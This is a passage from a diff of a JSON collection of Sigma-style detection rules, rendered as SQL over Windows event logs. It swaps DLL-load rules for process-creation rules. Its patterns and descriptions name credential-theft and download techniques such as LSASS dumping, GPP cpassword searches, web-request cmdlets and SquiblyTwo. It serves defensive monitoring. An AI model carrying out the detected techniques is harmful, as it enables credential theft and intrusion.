LIKE '%winrm%' ESCAPE '\\' AND (CommandLine LIKE '%format:pretty%' ESCAPE '\\' OR 
CommandLine LIKE '%format:\"pretty\"%' ESCAPE '\\' OR CommandLine LIKE '%format:\"text\"%' ESCAPE '\\' OR CommandLine LIKE '%format:text%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "image_load_dll_amsi_uncommon_process.yml" + "filename": "proc_creation_win_winrm_awl_bypass.yml" }, { - "title": "WMI Modules Loaded", - "id": "671bb7e3-a020-4824-a00e-2ee5b55f385e", + "title": "Usage Of Web Request Commands And Cmdlets", + "id": "9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d", "status": "test", - "description": "Detects non wmiprvse loading WMI modules", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine", + "author": "James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger", "tags": [ "attack.execution", - "attack.t1047" + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." 
], - "level": "informational", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (((ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WmiApRpl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WMINet\\_Utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WmiApSrv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DeviceCensus.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CompatTelRunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SIHClient.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ngentask.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\windows\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\windows\\\\system32\\\\MoUsoCoreWorker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\windows\\\\system32\\\\wbem\\\\WMIADAP.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\System32\\\\wbem\\\\unsecapp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\logman.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nvcontainer.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\System32\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera\\_autoupdate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\thor.exe' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%Net.WebClient%' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%Resume-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%[System.Net.WebRequest]::create%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RestMethod%' ESCAPE '\\' OR CommandLine LIKE '%WinHttp.WinHttpRequest%' ESCAPE '\\'))" ], - "filename": "image_load_wmi_module_load.yml" + "filename": "proc_creation_win_susp_web_request_cmd_and_cmdlets.yml" }, { - "title": "WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load", - "id": "b439f47d-ef52-4b29-9a2f-57d8a96cb6b8", - "status": "test", - "description": "Detects signs of the WMI script host process \"scrcons.exe\" loading scripting DLLs which could indciates WMI ActiveScriptEventConsumers EventConsumers activity.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Suspicious Sigverif Execution", + "id": "7d4aaec2-08ed-4430-8b96-28420e030e04", + "status": "experimental", + "description": "Detects the execution of sigverif binary as a parent process which could indicate it being used as a LOLBIN to proxy execution", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.003" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ - "Legitimate event consumers", - "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard 
button" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\vbscript.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemdisp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshom.ocx' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scrrun.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\sigverif.exe' ESCAPE '\\')" ], - "filename": "image_load_scrcons_wmi_scripteventconsumer.yml" + "filename": "proc_creation_win_lolbin_sigverif.yml" }, { - "title": "Third Party Software DLL Sideloading", - "id": "f9df325d-d7bc-4a32-8a1a-2cc61dcefc63", + "title": "Suspicious Workstation Locking via Rundll32", + "id": "3b5b0213-0460-4e3f-8937-3abf98ff7dcc", "status": "experimental", - "description": "Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "description": "Detects a suspicious call to the user32.dll function that locks the user workstation", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\commfunc.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE '%\\\\AppData\\\\local\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (ImageLoaded LIKE '%\\\\tosbtkbd.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program 
Files\\\\Toshiba\\\\Bluetooth Toshiba Stack\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Toshiba\\\\Bluetooth Toshiba Stack\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%user32.dll,%' ESCAPE '\\' AND CommandLine LIKE '%LockWorkStation%' ESCAPE '\\')" ], - "filename": "image_load_side_load_third_party.yml" + "filename": "proc_creation_win_rundll32_user32_dll.yml" }, { - "title": "WMI Persistence - Command Line Event Consumer", - "id": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", + "title": "Findstr GPP Passwords", + "id": "91a2c315-9ee6-4052-a853-6f6a8238f90d", "status": "test", - "description": "Detects WMI command line event consumers", - "author": "Thomas Patzke", + "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. 
This value can be decrypted with gpp-decrypt.", + "author": "frack113", "tags": [ - "attack.t1546.003", - "attack.persistence" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ - "Unknown (data set is too small; further testing needed)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbemcons.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%cpassword%' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.xml%' ESCAPE '\\'))" ], - "filename": "image_load_wmi_persistence_commandline_event_consumer.yml" + "filename": "proc_creation_win_findstr_gpp_passwords.yml" }, { - "title": "VBA DLL Loaded Via Office Application", - "id": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", + "title": "Remote Access Tool - GoToAssist Execution", + "id": "b6d98a4f-cef0-4abf-bbf6-24132854a83d", "status": "test", - "description": "Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.", - "author": "Antonlovesdnb", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\VBE7.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBEUI.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBE7INTL.DLL' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'GoTo Opener' OR Product = 'GoTo Opener' OR Company = 'LogMeIn, Inc.'))" ], - "filename": "image_load_office_vbadll_load.yml" + "filename": "proc_creation_win_remote_access_tools_gotoopener.yml" }, { - "title": "Suspicious Volume Shadow Copy Vssapi.dll Load", - "id": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", - "status": "experimental", - "description": "Detects the image load of VSS DLL by uncommon executables", - "author": "frack113", + "title": "Potential SquiblyTwo Technique Execution", + "id": "8d63dadf-b91b-4187-87b6-34a1114577ea", + "status": "test", + "description": "Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields", + "author": "Markus Neis, Florian Roth", "tags": [ "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.t1047", + "attack.t1220", + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - 
"SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe' OR Imphash IN ('1B1A3F43BF37B5BFE60751F2EE2F326E', '37777A96245A3C74EB217308F3546F4C', '9D87C9D67CE724033C0B40CC4CA1B206') OR (Hashes LIKE '%IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=37777A96245A3C74EB217308F3546F4C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D87C9D67CE724033C0B40CC4CA1B206%' ESCAPE '\\')) AND (CommandLine LIKE '%format:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\'))" ], - "filename": "image_load_dll_vssapi_susp_load.yml" + "filename": "proc_creation_win_wmic_squiblytwo_bypass.yml" }, { - "title": "Potential DLL Sideloading Via VMware Xfer", - "id": "9313dc13-d04c-46d8-af4a-a930cc55d93b", - "status": "experimental", - "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Spool Service Child Process", + "id": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", + "status": "test", + "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", + "author": "Justin C. 
(@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.execution", + "attack.t1203", + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\glib-2.0.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND ((((((NewProcessName LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wget.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cipher.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\write.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\net1.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%start%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.spl%' ESCAPE '\\' OR CommandLine LIKE '%route add%' ESCAPE '\\' OR CommandLine LIKE '%program files%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%add portopening%' ESCAPE '\\' OR CommandLine LIKE '%rule name%' ESCAPE '\\')))) OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%.spl%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\')))" ], - "filename": "image_load_side_load_vmware_xfer.yml" + "filename": "proc_creation_win_spoolsv_susp_child_processes.yml" }, { - "title": "Aruba Network Service Potential DLL Sideloading", - "id": "90ae0469-0cee-4509-b67f-e5efcef040f7", + "title": "Schtasks Creation Or Modification With SYSTEM Privileges", + "id": "89ca78fd-b37c-4310-b3d3-81a023f83936", "status": "experimental", - "description": "Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access \"arubanetsvc.exe\" process using DLL Search Order Hijacking", + "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", + "attack.execution", "attack.persistence", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\arubanetsvc.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcr100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpapi.dll' ESCAPE '\\')) AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '% /change %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\') AND CommandLine LIKE '%/ru %' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\') OR ((CommandLine LIKE '%/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR %' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files (x86)\\\\Avira\\\\System Speedup\\\\setup\\\\avira\\_speedup\\_setup.exe%' ESCAPE '\\' OR CommandLine LIKE '%/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST%' ESCAPE '\\'))))" ], - "filename": "image_load_side_load_aruba_networks_virtual_intranet_access.yml" + "filename": "proc_creation_win_schtasks_system.yml" }, { - "title": "Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded", - "id": "bdc64095-d59a-42a2-8588-71fd9c9d9abc", + "title": "Suspicious 
OfflineScannerShell.exe Execution From Another Folder", + "id": "02b18447-ea83-4b1b-8805-714a8a34546a", "status": "test", - "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", - "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "description": "Use OfflineScannerShell.exe to execute mpclient.dll library in the current working directory", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND Signed = 'false')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\OfflineScannerShell.exe' ESCAPE '\\' AND NOT ((CurrentDirectory LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\Offline\\\\' ESCAPE '\\') OR (CurrentDirectory = '')))" ], - "filename": "image_load_dll_dbghelp_dbgcore_unsigned_load.yml" + "filename": "proc_creation_win_lolbin_offlinescannershell.yml" }, { - "title": "DLL Load By System Process From Suspicious Locations", - "id": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", + "title": "Potential Credential Dumping Via WER", + "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", "status": "experimental", - "description": "Detects when a system process (ie located in system32, syswow64...etc) loads a DLL from a suspicious location such as %temp%", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential credential dumping via Windows 
Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass", + "author": "@pbssubhash , Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the \"-p\" parameter in the CommandLine." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\setup.exe%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Werfault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND CommandLine LIKE '% -u -p %' ESCAPE '\\' AND 
CommandLine LIKE '% -ip %' ESCAPE '\\' AND CommandLine LIKE '% -s %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')))" ], - "filename": "image_load_susp_dll_load_system_process.yml" + "filename": "proc_creation_win_werfault_lsass_shtinkering.yml" }, { - "title": "Wmiprvse Wbemcomn DLL Hijack", - "id": "7707a579-e0d8-4886-a853-ce47e4575aaa", + "title": "Logon Scripts (UserInitMprLogonScript)", + "id": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "description": "Detects creation or execution of UserInitMprLogonScript persistence method", + "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", + "tags": [ + "attack.t1037.001", + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Exclude legitimate logon scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%UserInitMprLogonScript%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%netlogon%.bat%' ESCAPE '\\' OR CommandLine LIKE '%UsrLogon.cmd%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\WINDOWS\\\\Explorer.EXE%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\proquota.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Citrix\\\\System32\\\\icast.exe' ESCAPE '\\')))))" ], - "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": 
"proc_creation_win_persistence_userinitmprlogonscript.yml" }, { - "title": "Suspicious Volume Shadow Copy VSS_PS.dll Load", - "id": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", + "title": "Wusa Extracting Cab Files", + "id": "59b39960-5f9d-4a49-9cef-1e4d2c1d0cb9", "status": "experimental", - "description": "Detects the image load of vss_ps.dll by uncommon executables", - "author": "Markus Neis, @markus_neis", + "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument which is not longer supported. This could indicate an attacker using an old technique", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.execution" ], "falsepositives": [ - "Unknown" + "The \"extract\" flag still works on older 